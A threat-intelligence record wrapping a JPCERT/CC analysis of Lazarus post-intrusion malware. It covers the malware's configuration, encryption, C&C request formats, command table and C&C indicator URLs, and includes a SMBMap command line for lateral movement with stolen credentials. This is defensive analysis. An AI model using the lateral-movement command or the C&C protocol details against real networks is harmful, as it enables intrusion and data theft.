{
	"id": "9c006310-8bec-41da-b85c-9497427e9435",
	"created_at": "2026-04-06T00:09:06.939425Z",
	"updated_at": "2026-04-10T03:38:19.714233Z",
	"deleted_at": null,
	"sha1_hash": "6dce6d69149bfaf80044c03f267e5b7525f55cd3",
	"title": "Malware Used by Lazarus after Network Intrusion - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1197504,
	"plain_text": "Malware Used by Lazarus after Network Intrusion - JPCERT/CC\r\nEyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2020-08-30 · Archived: 2026-04-02 10:39:53 UTC\r\nLazarus\r\nJPCERT/CC has observed attack activity by Lazarus (also known as Hidden Cobra) targeting Japanese\r\norganisations. Different types of malware are used during and after the intrusion. This article introduces one of the\r\ntypes of malware used after the intrusion.\r\nMalware Overview\r\nThis malware downloads and executes modules. It is saved as a .drv file in a folder such as C:\r\n¥Windows¥System32¥ and run as a service. It is obfuscated by using VMProtect. The file has some unnecessary\r\ndata at the end, which increases the file size up to about 150MB. Figure 1 shows the flow of events until the\r\nmalware runs.\r\nFigure 1: Malware behaviour\r\nThe following sections will explain the details of the malware as to configuration, communication format and\r\nmodules.\r\nConfiguration\r\nhttps://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html\r\nPage 1 of 11\n\nThe configuration of the malware (size: 0x6DE) is encrypted and stored in a registry entry and loaded when\r\nexecuted. In this analysis, it was confirmed that the configuration is stored at the following directory:\r\nKey: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\eventlog\\Application\r\nValue: Emulate\r\nFigure 2 is an example of decoded configuration. It contains an encryption key as well as C\u0026C server\r\ninformation. (Please see Appendix A for details.)\r\nFigure 2: Example of configuration\r\nObfuscation\r\nAll strings in the malware are encrypted with AES128. The encryption key is hardcoded in the malware. Figure 3\r\nis an example of an encryption key. 
Since the malware converts the 16-letter string to wide characters (32 bytes),\r\nonly the first 16 bytes are used as the key.\r\nFigure 3: Example of AES encryption key\r\nWindows API names are also AES-encrypted. After decrypting the API strings, the malware resolves the addresses of the APIs\r\nwith LoadLibrary and GetProcAddress.\r\nFigure 4: Windows API obfuscation\r\nC\u0026C server communication\r\nBelow is an example of the HTTP POST request that the malware first sends.\r\nPOST /[Path] HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nCookie: token=[a 4-digit random value][a 4-digit authentication key][times of communication]\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/7\r\nContent-Length: [Size]\r\nHost: [Server]\r\n[param]=[Base64 data]\r\nThe parameter ([param]) for the POST data is randomly selected from the following.\r\ntname;blogdata;content;thesis;method;bbs;level;maincode;tab;idx;tb;isbn;entry;doc;category;articles;p\r\nThe value in the POST data is the Base64-encoded string of the following data.\r\n[default AES Key]@[Unique ID]\r\nIf a value identical to the “4-digit authentication key” in the Cookie (Base64-encoded) is returned in the\r\nresponse from a C\u0026C server, the malware sends the following information.\r\nAfter the second communication, the malware sends the following HTTP POST request.\r\nPOST /[Path] HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/7\r\nContent-Length: [Size]\r\nHost: [Server]\r\nCookie: token=[numeric value]; JSESSIONID=[Session ID]\r\n[param]=[Data1 
(Base64 + AES)][Data2 (Base64 + AES)]\r\nThe parameter for the POST data is randomly selected from the aforementioned list. The POST data contains two\r\npieces of information. \"Data1\" contains commands while \"Data2\" contains the result of command execution and\r\nother additional data. (Please see Tables B-1 and B-2 in Appendix B for details.)\r\nThe format of the response data is the same as that of the request except that it lacks the parameter. The response data is AES-encrypted and then Base64-encoded as in the POST data. The difference is that the “+” sign is replaced by a\r\nspace.\r\nFigure 5 shows the flow of communication from the beginning of the malware's communication with a C\u0026C server until\r\na module is downloaded. In the second communication, the malware sends a new AES key, which encrypts the\r\ncommunication that follows.\r\nFigure 5: Malware communication flow\r\nAt the third communication, a module is downloaded. Below is an example of a response from a C\u0026C server when\r\ndownloading a module.\r\nHTTP/1.1 200 OK\r\nDate: Tue, 25 Jun 2020 21:30:42 GMT\r\nServer: Apache/2.4.26 (Unix) OpenSSL/1.0.1\r\nContent-Encoding: ISO-8859-1\r\nContent-Type: text/html;charset=ISO-8859-1\r\nAccess-Control-Allow-Origin: *\r\nKeep-Alive: timeout=5, max=98\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\n1ff8\r\n85RR0p8Pq3VfTrSugxgO2Q==Bjpj4qAKXKypb9JFS8IVYleb2P8vp9axDdXCBd…\r\nDownloaded module\r\nAfter a module is successfully downloaded, it performs the main functions such as receiving commands from the\r\nC\u0026C server. (Information including the C\u0026C servers and the encryption key is passed to the module by the malware as an\r\nargument.) The downloaded module is UPX-packed as in Figure 6.\r\nFigure 6: Downloaded module decoded\r\nThe communication is performed in mostly the same format as mentioned earlier. 
It is confirmed that the module\r\noffers multiple functions including the following (see Appendix C for details):\r\nOperation on files (list, delete, copy, modify creation time)\r\nOperation on processes (list, execute, kill)\r\nUpload/download files\r\nCreate and upload a ZIP file of an arbitrary directory\r\nExecute arbitrary shell commands\r\nObtain disk information\r\nModify system time\r\nLateral movement\r\nFor the purpose of lateral movement, SMBMap[1], a Python tool which allows access to remote hosts via SMB,\r\nwas used after converting it into a Windows PE file with PyInstaller. Attackers spread the infection laterally by\r\nleveraging account information which they had obtained beforehand.\r\n[File_Name].exe -u USERID -p PASSWORD=[password] -H [IP_Address] -x \"c:\\windows\\system32rundll32.exe\r\nIn closing\r\nActivities by Lazarus have been reported by many different organisations, and attacks are observed in multiple\r\ncountries. It is possible that similar cases will continue to be observed in Japan as well.\r\nC\u0026C server information for the samples mentioned in this article is listed in Appendix D. 
Please make sure that\r\nnone of your devices are communicating with these hosts.\r\nShusei Tomonaga\r\n(Translated by Yukako Uchida)\r\nReference\r\n[1] GitHub: SMBMap\r\nhttps://github.com/ShawnDEvans/smbmap\r\nAppendix A: Configuration\r\nTable A: List of configuration\r\nOffset Description Remarks\r\n0x000 Number of C\u0026C servers Up to 5\r\n0x004 C\u0026C server 1\r\n0x104 C\u0026C server 2\r\n0x204 C\u0026C server 3\r\n0x304 C\u0026C server 4\r\n0x404 C\u0026C server 5\r\n0x504 Not assigned Contains \"cmd.exe\"\r\n0x604 Operation time\r\n0x616 Sleep time\r\n0x626 Version information Contains \"x64_1.0\"\r\n0x676 Flag for unique ID\r\n0x67A Unique ID Creates a unique value based on the computer name\r\n0x6B6 AES Key\r\nAppendix B: Contents of data exchanged\r\nTable B-1: Data1 format (decrypted)\r\nOffset Length Contents\r\n0x00 4 Data1 size\r\n0x04 2 Random data\r\n0x06 2 Command\r\n0x08 4 Data2 size\r\n0x0C 2 Random or additional command\r\nTable B-2: Data2 format (decrypted)\r\nOffset Length Contents\r\n0x00 4 Data2 size\r\n0x04 - Data (depends on the command)\r\nAppendix C: Commands\r\nTable C: List of commands\r\nValue Contents\r\n0xABCF Get current directory\r\n0xABD5 Get file list\r\n0xABD7 Get process list\r\n0xABD9 Kill process\r\n0xABDB Execute process\r\n0xABDD Execute process (CreateProcessAsUser)\r\n0xABE1 Download file\r\n0xABE3 Upload file\r\n0xABE9 Upload files (create a ZIP)\r\n0xABEB Modify file creation time (timestomp)\r\n0xABED Change local time\r\n0xABF5 Delete file (sdelete)\r\n0xABF7 Execute shell command\r\n0xABF9 Check connection\r\n0xAC03 -\r\n0xAC05 -\r\n0xAC07 Change C\u0026C server\r\n0xAC0D Get disk/file information\r\n0xAC15 Change current directory\r\n0xAC17 -\r\n0xAC19 Get load process 
information\r\n0xAC27 Copy file\r\nAppendix D: C\u0026C servers\r\nhttps://gestao.simtelecomrs.com.br/sac/digital/client.jsp\r\nhttps://sac.onecenter.com.br/sac/masks/wfr_masks.jsp\r\nhttps://mk.bital.com.br/sac/Formule/Manager.jsp\r\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensics investigation, and is especially\r\ninvolved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security\r\nmonitoring and analysis operations at a foreign-affiliated IT vendor. He has presented at CODE BLUE, BsidesLV,\r\nBlackHat USA Arsenal, Botconf, PacSec and FIRST Conference. JSAC organizer.\r\nSource: https://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html"
	],
	"report_names": [
		"Lazarus-malware.html"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434146,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6dce6d69149bfaf80044c03f267e5b7525f55cd3.pdf",
		"text": "https://archive.orkl.eu/6dce6d69149bfaf80044c03f267e5b7525f55cd3.txt",
		"img": "https://archive.orkl.eu/6dce6d69149bfaf80044c03f267e5b7525f55cd3.jpg"
	}
}